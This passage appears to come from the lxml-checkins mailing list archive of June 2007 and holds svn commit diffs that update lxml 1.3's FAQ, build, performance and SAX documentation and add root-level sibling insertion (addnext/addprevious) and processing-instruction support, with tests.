lxml implement? 1.4 Where are the Windows binaries? 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 Why is my application so slow? + 1.6 How can I make my application run faster? 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Bugs - 2.1 My application crashes! Why does lxml.etree do that? - 2.2 I think I have found a bug in lxml. What should I do? - 3 Threading - 3.1 Can I use threads to concurrently access the lxml API? - 3.2 Does my program run faster if I use threads? - 3.3 Would my single-threaded program run faster if I turned off threading? - 4 Parsing and Serialisation - 4.1 Why doesn't the ``pretty_print`` option reformat my XML output? 
- 4.2 Why can't lxml parse my XML from unicode strings? - 4.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 4.4 Why can't I just delete parents or clear the root node in iterparse()? - 5 XPath and Document Traversal - 5.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 5.2 Why doesn't ``findall()`` support full XPath expressions? - 5.3 How can I find out which namespace prefixes are used in a document? - 5.4 How can I specify a default namespace for XPath expressions? + 2 Contributing + 2.1 Why is lxml not written in Python? + 2.2 How can I contribute? + 3 Bugs + 3.1 My application crashes! Why does lxml.etree do that? + 3.2 I think I have found a bug in lxml. What should I do? + 4 Threading + 4.1 Can I use threads to concurrently access the lxml API? + 4.2 Does my program run faster if I use threads? + 4.3 Would my single-threaded program run faster if I turned off threading? + 5 Parsing and Serialisation + 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 5.2 Why can't lxml parse my XML from unicode strings? + 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 5.4 Why can't I just delete parents or clear the root node in iterparse()? + 6 XPath and Document Traversal + 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 6.2 Why doesn't ``findall()`` support full XPath expressions? + 6.3 How can I find out which namespace prefixes are used in a document? + 6.4 How can I specify a default namespace for XPath expressions? General Questions @@ -133,17 +136,18 @@ XPath, XSLT or validation. -Why is my application so slow? ------------------------------- +How can I make my application run faster? +----------------------------------------- lxml.etree is a very fast library for processing XML. There are, however, `a few caveats`_ involved in the mapping of the powerful libxml2 library to the simple and convenient ElementTree API. 
Not all operations are as fast as the -simplicity of the API might suggest. The `benchmark page`_ has a comparison -to other ElementTree implementations and a number of tips for performance -tweaking. As with any Python application, the rule of thumb is: the more of -your processing runs in C, the faster your application gets. See also the -section on threading_. +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. .. _`a few caveats`: performance.html#the-elementtree-api .. _`benchmark page`: performance.html @@ -167,6 +171,65 @@ .. _`build instructions`: build.html +Contributing +============ + +Why is lxml not written in Python? +---------------------------------- + +lxml interfaces with two C libraries: libxml2 and libxslt. Accessing them at +the C-level is required for performance reasons. + +To avoid writing plain C-code and caring too much about the details of +built-in types and reference counting, lxml is written in Pyrex_, a +Python-like language that is translated into C-code. Chances are that if you +know Python, you can write `code that Pyrex accepts`_. Again, the C-ish style +used in the lxml code is just for performance optimisations. If you want to +contribute, don't bother with the details, a Python implementation of your +contribution is better than none. And keep in mind that lxml's flexible API +often favours an implementation of features in pure Python, without bothering +with C-code at all. + +Please contact the `mailing list`_ if you need any help. + +.. _Pyrex: http://www.cosc.canterbury.ac.nz/greg.ewing/python/Pyrex/ +.. 
_`code that Pyrex accepts`: http://www.cosc.canterbury.ac.nz/greg.ewing/python/Pyrex/version/Doc/overview.html + + +How can I contribute? +--------------------- + +Besides enhancing the code, there are a lot of places where you can help the +project and its user base. You can + +* spread the word and write about lxml. Many users (especially new Python + users) have not yet heard about lxml, although our user base is constantly + growing. If you write your own blog and feel like saying something about + lxml, go ahead and do so. If we think your contribution or criticism is + valuable to other users, we may even put a link or a quote on the project + page. + +* provide code examples for the general usage of lxml or specific problems + solved with lxml. Readable code is a very good way of showing how a library + can be used and what great things you can do with it. Again, if we hear + about it, we can set a link on the project page. + +* work on the documentation. The web page is generated from a set of ReST_ + `text files`_. It is meant both as a representative project page for lxml + and as a site for documenting lxml's API and usage. If you have questions + or an idea how to make it more readable and accessible while you are reading + it, please send a comment to the `mailing list`_. + +.. _ReST: http://docutils.sourceforge.net/rst.html +.. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ + +* improve the docstrings. lxml uses docstrings to support Python's integrated + online ``help()`` function. However, sometimes these are not sufficient to + grasp the details of the function in question. If you find such a place, + you can try to write up a better description and send it to the `mailing + list`_. + + Bugs ==== @@ -176,7 +239,7 @@ One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. 
Please report this bug to the -mailing list. See the next section on how to do that. +`mailing list`_. See the next section on how to do that. I think I have found a bug in lxml. What should I do? Modified: lxml/branch/lxml-1.3/doc/build.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/build.txt (original) +++ lxml/branch/lxml-1.3/doc/build.txt Tue Jun 12 18:53:57 2007 @@ -2,8 +2,10 @@ ============================= To build lxml from source, you need libxml2 and libxslt properly installed, -including header files (possibly shipped in -dev packages). The build process -also requires setuptools_. +*including the header files*. These are likely shipped in separate ``-dev`` +or ``-devel`` packages like ``libxml2-dev``, which you need to install. The +build process also requires setuptools_. The lxml source distribution comes +with a script called ``ez_setup.py`` that can be used to install them. .. _setuptools: http://peak.telecommunity.com/DevCenter/setuptools @@ -34,18 +36,22 @@ Newer versions of lxml depend on features and bug fixes that are not yet available in an official Pyrex release. This includes support for the - external C-API of lxml, for Python 2.5 and for 64 bit architectures. + external C-API of lxml.etree, for Python 2.5 and for 64 bit architectures. To build lxml 1.1 and later from non-release or modified sources, you must - therefore install an updated Pyrex version from here: + therefore use an updated Pyrex version from here: http://codespeak.net/svn/lxml/pyrex/ - Since version 1.1.2, the lxml source distribution includes this Pyrex - version. It will be used if the 'pyrex' directory is available in the lxml - root directory. If you install from SVN or delete this directory from the - unpacked distribution directory, the normally installed Pyrex version will - be used. 
+ A subversion checkout of lxml will automatically retrieve the latest Pyrex + as external project source (``svn:externals``). Look out for the ``Pyrex`` + directory in the source tree. + + Since version 1.1.2, the lxml source distribution also includes this Pyrex + version. It will be used if the ``Pyrex`` directory is available in the + lxml root directory. If you install from SVN or delete this directory from + the unpacked distribution directory, the normally installed Pyrex version + will be used. * lxml 1.0 and earlier @@ -86,6 +92,10 @@ python setup.py build +or:: + + python setup.py bdist_egg + If you want to test lxml from the source directory, it is better to build it in-place like this:: @@ -96,15 +106,24 @@ make If you get errors about missing header files (e.g., ``libxml/xmlversion.h``) -then you need to add the location of that file to the include path like:: +then you need to make sure the development packages of libxml2 and libxslt are +properly installed. If this doesn't help, you may have to add the location of +the header files to the include path like:: - python setup.py build_ext -i -I /usr/include/libxml2 + python setup.py build_ext -i -I /usr/include/libxml2 where the file is in ``/usr/include/libxml2/libxml/xmlversion.h`` To use lxml.etree in-place, you can place lxml's ``src`` directory on your Python module search path (PYTHONPATH) and then import ``lxml.etree`` to play -with it. +with it:: + + # cd lxml + # PYTHONPATH=src python + Python 2.5.1 + Type "help", "copyright", "credits" or "license" for more information. + >>> from lxml import etree + >>> To recompile after changes, note that you may have to run ``make clean`` or delete the file ``src/lxml/etree.c``. Distutils do not automatically pick up @@ -125,8 +144,8 @@ make test -To run the ElementTree and cElementTree compatibility tests, make sure -you have lxml on your PYTHONPATH first, then run:: +This also runs the ElementTree and cElementTree compatibility tests. 
To call +them separately, make sure you have lxml on your PYTHONPATH first, then run:: python selftest.py @@ -147,15 +166,16 @@ This is the procedure to make an lxml egg for your platform: -* download the lxml-x.y.tar.gz release. This contains the pregenerated C so we - don't run into any Pyrex issues. Unpack it and cd into it. +* Download the lxml-x.y.tar.gz release. This contains the pregenerated C so + that you don't run into any Pyrex issues. Unpack it and cd into it. * python setup.py build -* if you're on a unixy platform, cd into build/lib.your.platform and - strip any .so file you find there. This reduces the size of the egg. +* If you're on a unixy platform, cd into ``build/lib.your.platform`` and strip + any ``.so`` file you find there. This reduces the size of the egg + considerably. -* python setup.py bdist_egg upload +* ``python setup.py bdist_egg upload`` The last 'upload' step only works if you have access to the lxml cheeseshop entry. If not, you can just make an egg with ``bdist_egg`` and mail it to the Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Tue Jun 12 18:53:57 2007 @@ -14,7 +14,7 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm -The statements made here are backed by the benchmark scripts +The statements made here are backed by the (micro-)benchmark scripts `bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with the lxml source distribution. The timings cited below compare lxml 1.3 (with libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with @@ -30,10 +30,22 @@ attributes (-/A), with or without ASCII or unicode text (-/S/U), and either against a tree or its serialised form (T/X). 
In the result extracts cited below, T1 refers to a 3-level tree with many children at the third level, T2 -is swapped around to have many children at the root element, T3 is a deep tree -with few children at each level and T4 is a small tree, slightly broader than -deep. If repetition is involved, this usually means running the benchmark in -a loop over all children of the tree root. +is swapped around to have many children below the root element, T3 is a deep +tree with few children at each level and T4 is a small tree, slightly broader +than deep. If repetition is involved, this usually means running the +benchmark in a loop over all children of the tree root, otherwise, the +operation is run on the root node (C/R). + +As an example, the character code ``(SATR T1)`` states that the benchmark was +running for tree T1, with plain string text (S) and attributes (A). It was +run against the root element (R) in the tree structure of the data (T). + +Note that very small operations are repeated in integer loops to make them +measurable. It is therefore not always possible to compare the absolute +timings of, say, a single access benchmark (which usually loops) and a 'get +all in one step' benchmark, which already takes enough time to be measurable +and is therefore measured as is. Take a look at the concrete benchmarks in +the scripts to understand how the numbers compare. .. contents:: .. @@ -48,11 +60,11 @@ Bad things first ---------------- -First thing to say: there *is* an overhead involved in having a C library -mimic the ElementTree API. As opposed to ElementTree, lxml has to generate -Python objects on the fly when asked for them. What this means is: the more -of your code runs in Python, the slower your application gets. Note, however, -that this is true for most performance critical Python applications. +First thing to say: there *is* an overhead involved in having a DOM-like C +library mimic the ElementTree API. 
As opposed to ElementTree, lxml has to +generate Python objects on the fly when asked for them. What this means is: +the more of your code runs in Python, the slower your application gets. Note, +however, that this is true for most performance critical Python applications. Parsing and Serialising @@ -132,20 +144,20 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1029 0.1005 0.0998 0.1003 0.0998 0.1002 - T2: 0.1035 0.1013 0.1015 0.1090 0.1089 0.1090 - T3: 0.0276 0.0270 0.0273 0.0679 0.0673 0.0673 - T4: 0.0004 0.0004 0.0004 0.0013 0.0013 0.0013 + T1: 0.1155 0.1154 0.1153 0.1159 0.1181 0.1158 + T2: 0.1183 0.1197 0.1200 0.1267 0.1261 0.1264 + T3: 0.0341 0.0312 0.0314 0.0726 0.0717 0.0720 + T4: 0.0005 0.0004 0.0004 0.0014 0.0014 0.0014 cET: -- S- U- -A SA UA - T1: 0.0277 0.0273 0.0273 0.0272 0.0278 0.0275 - T2: 0.0281 0.0347 0.0281 0.0285 0.0284 0.0284 - T3: 0.0074 0.0074 0.0074 0.0122 0.0102 0.0101 + T1: 0.0290 0.0271 0.0275 0.0297 0.0273 0.0274 + T2: 0.0280 0.0280 0.0281 0.0285 0.0283 0.0286 + T3: 0.0071 0.0072 0.0071 0.0113 0.0096 0.0096 T4: 0.0001 0.0001 0.0001 0.0001 0.0001 0.0001 ET : -- S- U- -A SA UA - T1: 0.1349 0.1962 0.2356 0.1288 0.2642 0.1351 - T2: 0.3104 0.1344 0.3566 0.3857 0.1354 0.4677 - T3: 0.0313 0.0325 0.0312 0.0356 0.3803 0.0364 - T4: 0.0005 0.0005 0.0008 0.0006 0.0007 0.0006 + T1: 0.1362 0.1985 0.2300 0.1344 0.2672 0.1335 + T2: 0.3107 0.1386 0.3581 0.3886 0.1388 0.4277 + T3: 0.0334 0.0332 0.0320 0.0367 0.3769 0.0375 + T4: 0.0006 0.0005 0.0008 0.0007 0.0007 0.0006 While lxml is still faster than ET in most cases (30-60%), cET can be up to three times faster than lxml here. One of the reasons is that lxml must @@ -161,6 +173,29 @@ cET: root_getchildren (--TR T2) 0.0150 msec/pass ET : root_getchildren (--TR T2) 0.0091 msec/pass +When accessing single children, however, e.g. 
by index, this handicap is +negligible:: + + lxe: first_child (--TR T2) 0.2499 msec/pass + cET: first_child (--TR T2) 0.2048 msec/pass + ET : first_child (--TR T2) 0.9291 msec/pass + + lxe: last_child (--TR T1) 0.2511 msec/pass + cET: last_child (--TR T1) 0.2148 msec/pass + ET : last_child (--TR T1) 0.9191 msec/pass + +... unless you add the time to find a child index in a bigger list, as ET and +cET use Python lists here, which are based on arrays. The data structure used +by libxml2 is a linked tree, and thus, a linked list of children:: + + lxe: middle_child (--TR T1) 0.2921 msec/pass + cET: middle_child (--TR T1) 0.2069 msec/pass + ET : middle_child (--TR T1) 0.9291 msec/pass + + lxe: middle_child (--TR T2) 1.9028 msec/pass + cET: middle_child (--TR T2) 0.2089 msec/pass + ET : middle_child (--TR T2) 0.9360 msec/pass + As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: Modified: lxml/branch/lxml-1.3/doc/sax.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/sax.txt (original) +++ lxml/branch/lxml-1.3/doc/sax.txt Tue Jun 12 18:53:57 2007 @@ -39,6 +39,10 @@ >>> lxml.etree.tostring(tree.getroot()) '<a><b foo="bar">Hello world</b></a>' +By passing a ``makeelement`` function to the constructor of +``ElementTreeContentHandler``, e.g. the one of a parser you configured, you +can determine which element class lookup scheme should be used. 
+ Producing SAX events from an ElementTree or Element --------------------------------------------------- Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 18:53:57 2007 @@ -518,7 +518,6 @@ c_node = child._c_node # store possible text node c_next = c_node.next - # XXX what if element is coming from a different document? tree.xmlUnlinkNode(c_node) # move node itself tree.xmlAddChild(parent._c_node, c_node) @@ -527,6 +526,38 @@ # parent element has moved; change them too.. moveNodeToDocument(child, parent._doc) +cdef void _appendSibling(_Element element, _Element sibling): + """Add a new sibling directly after an element. + """ + cdef xmlNode* c_next + cdef xmlNode* c_node + c_node = sibling._c_node + # store possible text node + c_next = c_node.next + tree.xmlUnlinkNode(c_node) + # move node itself + tree.xmlAddNextSibling(element._c_node, c_node) + _moveTail(c_next, c_node) + # uh oh, elements may be pointing to different doc when + # parent element has moved; change them too.. + moveNodeToDocument(sibling, element._doc) + +cdef void _prependSibling(_Element element, _Element sibling): + """Add a new sibling directly before an element. + """ + cdef xmlNode* c_next + cdef xmlNode* c_node + c_node = sibling._c_node + # store possible text node + c_next = c_node.next + tree.xmlUnlinkNode(c_node) + # move node itself + tree.xmlAddPrevSibling(element._c_node, c_node) + _moveTail(c_next, c_node) + # uh oh, elements may be pointing to different doc when + # parent element has moved; change them too.. 
+ moveNodeToDocument(sibling, element._doc) + cdef int isutf8(char* s): cdef char c c = s[0] Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:53:57 2007 @@ -531,6 +531,36 @@ """ _appendChild(self, element) + def addnext(self, _Element element): + """Adds the element as a following sibling directly after this + element. + + This is normally used to set a processing instruction or comment after + the root node of a document. Note that tail text is automatically + discarded when adding at the root level. + """ + if self._c_node.parent != NULL and not _isElement(self._c_node.parent): + if element._c_node.type != tree.XML_PI_NODE: + if element._c_node.type != tree.XML_COMMENT_NODE: + raise TypeError, "Only processing instructions and comments can be siblings of the root element" + element.tail = None + _appendSibling(self, element) + + def addprevious(self, _Element element): + """Adds the element as a preceding sibling directly before this + element. + + This is normally used to set a processing instruction or comment + before the root node of a document. Note that tail text is + automatically discarded when adding at the root level. + """ + if self._c_node.parent != NULL and not _isElement(self._c_node.parent): + if element._c_node.type != tree.XML_PI_NODE: + if element._c_node.type != tree.XML_COMMENT_NODE: + raise TypeError, "Only processing instructions and comments can be siblings of the root element" + element.tail = None + _prependSibling(self, element) + def extend(self, elements): """Extends the current children by the elements in the iterable. 
""" @@ -1096,6 +1126,9 @@ def items(self): return [] + def values(self): + return [] + cdef class _Comment(__ContentOnlyElement): property tag: def __get__(self): @@ -1749,6 +1782,8 @@ tree.xmlAddChild(<xmlNode*>c_doc, c_node) return _elementFactory(doc, c_node) +PI = ProcessingInstruction + def SubElement(_Element _parent not None, _tag, attrib=None, nsmap=None, **_extra): """Subelement factory. This function creates an element instance, and appends it to an Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Tue Jun 12 18:53:57 2007 @@ -1,5 +1,6 @@ from xml.sax.handler import ContentHandler from etree import ElementTree, Element, SubElement, LxmlError +from etree import XML, Comment, ProcessingInstruction class SaxError(LxmlError): pass @@ -15,6 +16,7 @@ """ def __init__(self, makeelement=None): self._root = None + self._root_siblings = [] self._element_stack = [] self._default_ns = None self._ns_mapping = { None : [None] } @@ -82,6 +84,10 @@ if self._root is None: element = self._root = \ self._makeelement(el_name, attrs, self._new_mappings) + if self._root_siblings and hasattr(element, 'addprevious'): + for sibling in self._root_siblings: + element.addprevious(sibling) + del self._root_siblings[:] else: element = SubElement(element_stack[-1], el_name, attrs, self._new_mappings) @@ -89,10 +95,16 @@ self._new_mappings.clear() + def processingInstruction(self, target, data): + pi = ProcessingInstruction(target, data) + if self._root is None: + self._root_siblings.append(pi) + else: + self._element_stack[-1].append(pi) + def endElementNS(self, ns_name, qname): element = self._element_stack.pop() - tag = element.tag - if ns_name != _getNsTag(tag): + if ns_name != _getNsTag(element.tag): raise SaxError, "Unexpected element closed: {%s}%s" % ns_name def startElement(self, name, attributes=None): @@ 
-106,10 +118,13 @@ try: # if there already is a child element, we must append to its tail last_element = last_element[-1] - last_element.tail = (last_element.tail or u'') + data + last_element.tail = (last_element.tail or '') + data except IndexError: # otherwise: append to the text - last_element.text = (last_element.text or u'') + data + last_element.text = (last_element.text or '') + data + + ignorableWhitespace = characters + class ElementTreeProducer(object): """Produces SAX events for an element and children. @@ -124,13 +139,41 @@ from xml.sax.xmlreader import AttributesNSImpl as attr_class self._attr_class = attr_class self._empty_attributes = attr_class({}, {}) - + def saxify(self): self._content_handler.startDocument() - self._recursive_saxify(self._element, {}) + + element = self._element + if hasattr(element, 'getprevious'): + siblings = [] + sibling = element.getprevious() + while getattr(sibling, 'tag', None) is ProcessingInstruction: + siblings.append(sibling) + sibling = sibling.getprevious() + for sibling in siblings[::-1]: + self._recursive_saxify(sibling, {}) + + self._recursive_saxify(element, {}) + + if hasattr(element, 'getnext'): + sibling = element.getnext() + while getattr(sibling, 'tag', None) is ProcessingInstruction: + self._recursive_saxify(sibling, {}) + sibling = sibling.getnext() + self._content_handler.endDocument() def _recursive_saxify(self, element, prefixes): + content_handler = self._content_handler + tag = element.tag + if tag is Comment or tag is ProcessingInstruction: + if tag is ProcessingInstruction: + content_handler.processingInstruction( + element.target, element.text) + if element.tail: + content_handler.characters(element.tail) + return + new_prefixes = [] build_qname = self._build_qname attribs = element.items() @@ -146,10 +189,9 @@ else: sax_attributes = self._empty_attributes - ns_uri, local_name = _getNsTag(element.tag) + ns_uri, local_name = _getNsTag(tag) qname = build_qname(ns_uri, local_name, prefixes, 
new_prefixes) - content_handler = self._content_handler for prefix, uri in new_prefixes: content_handler.startPrefixMapping(prefix, uri) content_handler.startElementNS((ns_uri, local_name), Modified: lxml/branch/lxml-1.3/src/lxml/serializer.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/serializer.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/serializer.pxi Tue Jun 12 18:53:57 2007 @@ -78,8 +78,10 @@ if write_xml_declaration: _writeDeclarationToBuffer(c_buffer, c_doc.version, encoding) + _writePrevSiblings(c_buffer, c_node, encoding, pretty_print) tree.xmlNodeDumpOutput(c_buffer, c_doc, c_node, 0, pretty_print, encoding) _writeTail(c_buffer, c_node, encoding, pretty_print) + _writeNextSiblings(c_buffer, c_node, encoding, pretty_print) cdef void _writeDeclarationToBuffer(tree.xmlOutputBuffer* c_buffer, char* version, char* encoding): @@ -100,6 +102,36 @@ pretty_print, encoding) c_node = c_node.next +cdef void _writePrevSiblings(tree.xmlOutputBuffer* c_buffer, xmlNode* c_node, + char* encoding, int pretty_print): + cdef xmlNode* c_sibling + if c_node.parent is not NULL and _isElement(c_node.parent): + return + # we are at a root node, so add PI and comment siblings + c_sibling = c_node + while c_sibling.prev != NULL and \ + (c_sibling.prev.type == tree.XML_PI_NODE or \ + c_sibling.prev.type == tree.XML_COMMENT_NODE): + c_sibling = c_sibling.prev + while c_sibling != c_node: + tree.xmlNodeDumpOutput(c_buffer, c_node.doc, c_sibling, 0, + pretty_print, encoding) + c_sibling = c_sibling.next + +cdef void _writeNextSiblings(tree.xmlOutputBuffer* c_buffer, xmlNode* c_node, + char* encoding, int pretty_print): + cdef xmlNode* c_sibling + if c_node.parent is not NULL and _isElement(c_node.parent): + return + # we are at a root node, so add PI and comment siblings + c_sibling = c_node.next + while c_sibling != NULL and \ + (c_sibling.type == tree.XML_PI_NODE or \ + c_sibling.type == 
tree.XML_COMMENT_NODE): + tree.xmlNodeDumpOutput(c_buffer, c_node.doc, c_sibling, 0, + pretty_print, encoding) + c_sibling = c_sibling.next + # output to file-like objects cdef class _FilelikeWriter: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:53:57 2007 @@ -404,6 +404,156 @@ Element = self.etree.Element self.assertRaises(TypeError, Element('a').append, None) + def test_addnext(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + root = Element('root') + SubElement(root, 'a') + SubElement(root, 'b') + + self.assertEquals(['a', 'b'], + [c.tag for c in root]) + root[1].addnext(root[0]) + self.assertEquals(['b', 'a'], + [c.tag for c in root]) + + def test_addprevious(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + root = Element('root') + SubElement(root, 'a') + SubElement(root, 'b') + + self.assertEquals(['a', 'b'], + [c.tag for c in root]) + root[0].addprevious(root[1]) + self.assertEquals(['b', 'a'], + [c.tag for c in root]) + + def test_addnext_root(self): + Element = self.etree.Element + a = Element('a') + b = Element('b') + self.assertRaises(TypeError, a.addnext, b) + + def test_addnext_root(self): + Element = self.etree.Element + a = Element('a') + b = Element('b') + self.assertRaises(TypeError, a.addnext, b) + + def test_addprevious_pi(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + PI = self.etree.PI + root = Element('root') + SubElement(root, 'a') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addprevious(pi) + self.assertEquals('<root><?TARGET TEXT?>TAIL<a></a></root>', + self._writeElement(root)) + + def test_addprevious_root_pi(self): + Element = self.etree.Element + 
PI = self.etree.PI + root = Element('root') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addprevious(pi) + self.assertEquals('<?TARGET TEXT?>\n<root></root>', + self._writeElement(root)) + + def test_addnext_pi(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + PI = self.etree.PI + root = Element('root') + SubElement(root, 'a') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addnext(pi) + self.assertEquals('<root><a></a><?TARGET TEXT?>TAIL</root>', + self._writeElement(root)) + + def test_addnext_root_pi(self): + Element = self.etree.Element + PI = self.etree.PI + root = Element('root') + pi = PI('TARGET', 'TEXT') + pi.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addnext(pi) + self.assertEquals('<root></root>\n<?TARGET TEXT?>', + self._writeElement(root)) + + def test_addnext_comment(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + Comment = self.etree.Comment + root = Element('root') + SubElement(root, 'a') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addnext(comment) + self.assertEquals('<root><a></a><!--TEXT -->TAIL</root>', + self._writeElement(root)) + + def test_addnext_root_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + root = Element('root') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addnext(comment) + self.assertEquals('<root></root>\n<!--TEXT -->', + self._writeElement(root)) + + def test_addprevious_comment(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + Comment = self.etree.Comment + root = Element('root') + SubElement(root, 'a') + comment = Comment('TEXT ') + 
comment.tail = "TAIL" + + self.assertEquals('<root><a></a></root>', + self._writeElement(root)) + root[0].addprevious(comment) + self.assertEquals('<root><!--TEXT -->TAIL<a></a></root>', + self._writeElement(root)) + + def test_addprevious_root_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + root = Element('root') + comment = Comment('TEXT ') + comment.tail = "TAIL" + + self.assertEquals('<root></root>', + self._writeElement(root)) + root.addprevious(comment) + self.assertEquals('<!--TEXT -->\n<root></root>', + self._writeElement(root)) + # gives error in ElementTree def test_comment_empty(self): Element = self.etree.Element Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py Tue Jun 12 18:53:57 2007 @@ -25,6 +25,30 @@ self.assertEquals('<a>ab<b>bb</b>ba</a>', xml_out) + def test_etree_sax_comment(self): + tree = self.parse('<a>ab<!-- TEST -->ba</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>abba</a>', + xml_out) + + def test_etree_sax_pi(self): + tree = self.parse('<a>ab<?this and that?>ba</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>ab<?this and that?>ba</a>', + xml_out) + + def test_etree_sax_comment_root(self): + tree = self.parse('<!-- TEST --><a>ab</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<a>ab</a>', + xml_out) + + def test_etree_sax_pi_root(self): + tree = self.parse('<?this and that?><a>ab</a>') + xml_out = self._saxify_serialize(tree) + self.assertEquals('<?this and that?><a>ab</a>', + xml_out) + def test_etree_sax_attributes(self): tree = self.parse('<a aa="5">ab<b b="5"/>ba</a>') xml_out = self._saxify_serialize(tree) From scoder at codespeak.net Tue Jun 12 19:00:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 
19:00:37 +0200 (CEST) Subject: [Lxml-checkins] r44181 - lxml/branch/lxml-1.3/doc Message-ID: <20070612170037.125638194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:00:36 2007 New Revision: 44181 Modified: lxml/branch/lxml-1.3/doc/element_classes.txt lxml/branch/lxml-1.3/doc/resolvers.txt lxml/branch/lxml-1.3/doc/xpathxslt.txt Log: doc updates from trunk (XPath/XSLT) Modified: lxml/branch/lxml-1.3/doc/element_classes.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/element_classes.txt (original) +++ lxml/branch/lxml-1.3/doc/element_classes.txt Tue Jun 12 19:00:36 2007 @@ -4,8 +4,8 @@ lxml has very sophisticated support for custom Element classes. You can provide your own classes for Elements and have lxml use them by default, for -all elements generated by a specific parser or only for a specific tag name in -a specific namespace. +all elements generated by a specific parser, for a specific tag name in a +specific namespace or for an exact element at a specific position in the tree. Custom Elements must inherit from the ``lxml.etree.ElementBase`` class, which provides the Element interface for subclasses:: @@ -33,7 +33,7 @@ Element initialization ----------------------- +====================== There is one thing to know up front. Element classes *must not* have a constructor, neither must there be any internal state (except for the data @@ -43,10 +43,12 @@ called, the object may not even be initialized yet to represent the XML tag, so there is not much use in providing an ``__init__`` method in subclasses. -However, there is one possible way to do things on element initialization, if -you really need to. ElementBase classes have an ``_init()`` method that can -be overridden. It can be used to modify the XML tree, e.g. to construct -special children or verify and update attributes. 
+Most use cases will not require any class initialisation, so you can content +yourself with skipping to the next section for now. However, if you really +need to set up your element class on instantiation, there is one possible way +to do so. ElementBase classes have an ``_init()`` method that can be +overridden. It can be used to modify the XML tree, e.g. to construct special +children or verify and update attributes. The semantics of ``_init()`` are as follows: @@ -72,7 +74,7 @@ Setting up a class lookup scheme --------------------------------- +================================ The first thing to do when deploying custom element classes is to register a class lookup scheme on a parser. lxml.etree provides quite a number of @@ -139,7 +141,7 @@ Default class lookup -.................... +-------------------- This is the most simple lookup mechanism. It always returns the default element class. Consequently, no further fallbacks are supported, but this @@ -178,7 +180,7 @@ Namespace class lookup -...................... +---------------------- This is an advanced lookup mechanism that supports namespace/tag-name specific element classes. You can select it by calling:: @@ -203,14 +205,15 @@ Attribute based lookup -...................... +---------------------- This scheme uses a mapping from attribute values to classes. An attribute name is set at initialisation time and is then used to find the corresponding value. It is set up as follows:: >>> id_class_mapping = {} # maps attribute values to element classes - >>> lookup = etree.AttributeBasedElementClassLookup('id', id_class_mapping) + >>> lookup = etree.AttributeBasedElementClassLookup( + ... 'id', id_class_mapping) >>> parser = etree.XMLParser() >>> parser.setElementClassLookup(lookup) @@ -229,7 +232,7 @@ 